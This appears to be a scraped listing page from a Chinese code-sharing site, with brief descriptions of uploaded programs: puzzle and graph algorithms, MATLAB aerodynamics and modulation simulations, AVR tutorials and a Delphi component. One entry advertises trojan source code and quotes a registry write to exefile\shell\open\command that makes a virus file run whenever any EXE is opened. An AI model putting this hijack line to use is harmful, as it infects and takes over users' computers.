Solve the 8-puzzle problem using A * algorithme. Input: Program reads start state and goal state and heuristic (N or S) from EightPuzzle.INP file.0 representing blank. There are 2 Heuristic: 1. N: Number of misplaced tiles 2. S: Sum of Manhattan distance of current location and target location. Format: The first line write type of heuristic (N or S). Next is the status of departing and landing status. Between 2 states of 1 line blank. See examples EightPuzzle.INP
標簽: state algorithme Program problem
上傳時間: 2017-08-12
上傳用戶:jjj0202
可以在安全模式加載的木馬源代碼 寫注冊項 (#根類, “exefile\shell\open\command\”, 取特定目錄 (9) + “penguin01.exe ” + #引號 + “ 1” + #引號 + “ *”) 靠著這條就無敵啦``` 運行任意EXE文件 都會先運行病毒文件.
標簽: exefileshellopencommand penguin exe 01
上傳時間: 2014-01-02
上傳用戶:sardinescn
本程序的開發(fā)環(huán)境為MATLAB6.5版本,所編程序須在此環(huán)境下運行。由于氣動模型的離散性,且采用了許多工程計算經(jīng)驗公式和實驗數(shù)據(jù),所以在編程時會比較繁雜,為了使程序讀起來方便清晰,在編制程序時采用了如下的思路: 考慮到程序的一般結構,這里將氣動計算系統(tǒng)分為三大模塊:輸入模塊、氣動計算模塊以及結果輸出模塊。考慮到本系統(tǒng)的特殊性,又將輸入模塊劃分為初始數(shù)據(jù)輸入模塊、導彈外形參數(shù)模塊以及插值數(shù)據(jù)庫模塊,并采用M文件格式編制;氣動計算模塊則采用了子系統(tǒng)的結構形式,并用Simulink 模塊編制;結果輸出模塊則是采用M文件的形式將氣動計算模塊得到的結果輸出到工作區(qū)間并將數(shù)據(jù)結果繪制成曲線。最后,為了運行的方便,編制了一個名為Start_file.m的M文件,按流程依次調(diào)用編寫的所有程序,在運行此程序時,只需將所有程序加載于“Current Directory”指定的文件夾中(即路徑的設定),并在“Command Window”中輸入“Start_file”即可。 (導彈氣動計算程序)
標簽: MATLAB 6.5 程序 開發(fā)環(huán)境
上傳時間: 2014-01-04
上傳用戶:xhz1993
Implementation of Edmonds Karp algorithm that calculates maxFlow of graph. Input: For each test case, the first line contains the number of vertices (n) and the number of arcs (m). Then, there exist m lines, one for each arc (source vertex, ending vertex and arc weight, separated by a space). The nodes are numbered from 1 to n. The node 1 and node n should be in different sets. There are no more than 30 arcs and 15 nodes. The arc weights vary between 1 and 1 000 000. Output: The output is a single line for each case, with the corresponding minimum size cut. Example: Input: 7 11 1 2 3 1 4 3 2 3 4 3 1 3 3 4 1 3 5 2 4 6 6 4 5 2 5 2 1 5 7 1 6 7 9 Output: 5
標簽: Implementation calculates algorithm Edmonds
上傳時間: 2014-01-04
上傳用戶:kiklkook
Supplemental information for a high-speed serial bus that integrates well with most IEEE standard 32-bit and 64-bit parallel buses is specified. It is intended to extend the usefulness of a low-cost interconnect between external peripherals, IEEE Std 1394-1995. This standard follows the ISO/IEC 13213:1994 Command and Status Register (CSR) architecture.
標簽: Supplemental information high-speed integrates
上傳時間: 2014-03-07
上傳用戶:jjj0202
本程序用于完成BPSK、QPSK、8PSK的調(diào)制仿真。并可任意擴展到MPSK和MQAM。程序分成三個部分:phase.m對基帶碼元序列進行脈沖成型,可選矩形脈沖,升余弦脈沖和平方根升余弦脈沖; model.m 為主程序,完成各種信號的基帶星座圖映射、脈沖成型和調(diào)制; command.m給出一個簡單的頻譜顯示測試。
上傳時間: 2014-01-14
上傳用戶:yangbo69
AVR single-chip developed by a very low threshold, as long as the computer will be able to study the development of AVR microcontroller. Only a single-chip ISP download beginners line, the editing, debugging of software programs through a direct line into the AVR microcontroller, which can develop AVR Series Single-chip package of a variety of devices. AVR single-chip microcomputer in the industry known as "front-line struggle to seize state power."
標簽: single-chip developed threshold the
上傳時間: 2017-09-12
上傳用戶:shinesyh
AVR single-chip developed by a very low threshold, as long as the computer will be able to study the development of AVR microcontroller. Only a single-chip ISP download beginners line, the editing, debugging of software programs through a direct line into the AVR microcontroller, which can develop AVR Series Single-chip package of a variety of devices. AVR single-chip microcomputer in the industry known as "front-line struggle to seize state power."
標簽: single-chip developed threshold the
上傳時間: 2013-12-09
上傳用戶:invtnewer
深入淺出MFC,作者:侯俊杰,深入介紹Runtime Type Information(RTTI)、Dynamic Creation、Persistence(Serialization)、Message Mapping、Command Routing等核心技術。
標簽: Serialization Information Persistence Creation
上傳時間: 2014-01-10
上傳用戶:moshushi0009
TdcHintEx Provides your users with a cool transparent hint. It replaces standard Delphi hint window. Just drop a TdcHintEx in your main form. Set Enabled to True. And run your application. Oh btw, please set ShowHint to True.. :) Drop me a line, and tell me what you think of it. Antony Hoon antony7777@telkom.net
標簽: hint transparent TdcHintEx Provides
上傳時間: 2014-01-12
上傳用戶:181992417